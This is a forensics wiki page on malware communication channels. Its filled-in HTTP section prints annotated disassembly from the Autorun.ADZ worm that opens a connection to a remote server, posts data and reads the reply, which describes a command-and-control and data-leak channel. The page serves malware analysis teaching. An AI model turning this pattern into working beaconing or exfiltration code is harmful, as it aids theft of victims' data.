Category:Digital-Forensics/Computer-Forensics/Communication-Channels

From aldeid
Jump to navigation Jump to search
You are here:
Communication Channels

Description

Most malwares communicate with a remote host for various tasks:

  • check if updates are available
  • alert the attacker that the host is infected
  • receive external commands, synchronize multiple hosts with a Command & Control (C&C) to perform a Denial of Service (DoS) attack
  • leak data (e.g. passwords, credit card numbers, network architecture, confidential documents, ...)

Let's review some of these control communication channels.

HTTP

Description

Incomplete.png
INCOMPLETE SECTION OR ARTICLE
This section/article is being written and is therefore not complete.
Thank you for your comprehension.

Steps

The code below is an extract from Worm:Win32/Autorun.ADZ available for download here.

Step Functions Example
Create HTTP connection
.text:00403AF6                 push    ebx             ; dwFlags
.text:00403AF7                 push    ebx             ; lpszProxyBypass
.text:00403AF8                 push    ebx             ; lpszProxy
.text:00403AF9                 push    4               ; dwAccessType
.text:00403AFB                 push    offset szAgent  ; "74978o6rpp6p19836n17n3p2pq0840o0"
.text:00403B00                 call    ds:InternetOpenA
.text:00403B06                 mov     [ebp+158h+var_180], eax
.text:00403B09                 cmp     eax, ebx
.text:00403B0B                 jz      loc_403C6E
.text:00403B11                 push    ebx             ; dwContext
.text:00403B12                 push    ebx             ; dwFlags
.text:00403B13                 push    3               ; dwService
.text:00403B15                 push    ebx             ; lpszPassword
.text:00403B16                 push    ebx             ; lpszUserName
.text:00403B17                 push    50h             ; nServerPort
.text:00403B19                 lea     ecx, [ebp+158h+szServerName]
.text:00403B1F                 push    ecx             ; lpszServerName
.text:00403B20                 push    eax             ; hInternet
.text:00403B21                 call    ds:InternetConnectA
Build HTTP request
.text:00403B32                 push    ebx             ; dwContext
.text:00403B33                 push    8468C200h       ; dwFlags
.text:00403B38                 push    ebx             ; lplpszAcceptTypes
.text:00403B39                 push    ebx             ; lpszReferrer
.text:00403B3A                 push    offset szVersion ; "HTTP/1.0"
.text:00403B3F                 lea     ecx, [ebp+158h+szObjectName]
.text:00403B45                 push    ecx             ; lpszObjectName
.text:00403B46                 push    offset szVerb   ; "POST"
.text:00403B4B                 push    eax             ; hConnect
.text:00403B4C                 call    ds:HttpOpenRequestA

[SNIP]

.text:00403B69                 push    20000000h       ; dwModifiers
.text:00403B6E                 push    [ebp+158h+dwHeadersLength] ; dwHeadersLength
.text:00403B71                 push    eax             ; lpszHeaders
.text:00403B72                 push    [ebp+158h+hInternet] ; hRequest
.text:00403B75                 call    ds:HttpAddRequestHeadersA
Send HTTP request
.text:00403C4F                 push    [ebp+158h+dwOptionalLength] ; dwOptionalLength
.text:00403C52                 push    edi             ; lpOptional
.text:00403C53                 push    ebx             ; dwHeadersLength
.text:00403C54                 push    ebx             ; lpszHeaders
.text:00403C55                 push    [ebp+158h+hInternet] ; hRequest
.text:00403C58                 call    ds:HttpSendRequestA
Read response
.text:00403FA4                 lea     ecx, [ebp+148h+dwNumberOfBytesRead]
.text:00403FA7                 push    ecx             ; lpdwNumberOfBytesRead
.text:00403FA8                 push    [ebp+148h+lpOptional] ; dwNumberOfBytesToRead
.text:00403FAB                 mov     [ebp+148h+lpMem], eax
.text:00403FAE                 push    eax             ; lpBuffer
.text:00403FAF                 push    [ebp+148h+hInternet] ; hFile
.text:00403FB2                 call    ds:InternetReadFile

IRC

Incomplete.png
INCOMPLETE SECTION OR ARTICLE
This section/article is being written and is therefore not complete.
Thank you for your comprehension.

P2P

Incomplete.png
INCOMPLETE SECTION OR ARTICLE
This section/article is being written and is therefore not complete.
Thank you for your comprehension.

Comments

blog comments powered by Disqus

Pages in this category

Pages in category "Digital-Forensics/Computer-Forensics/Communication-Channels"

The following 10 pages are in this category, out of 10 total.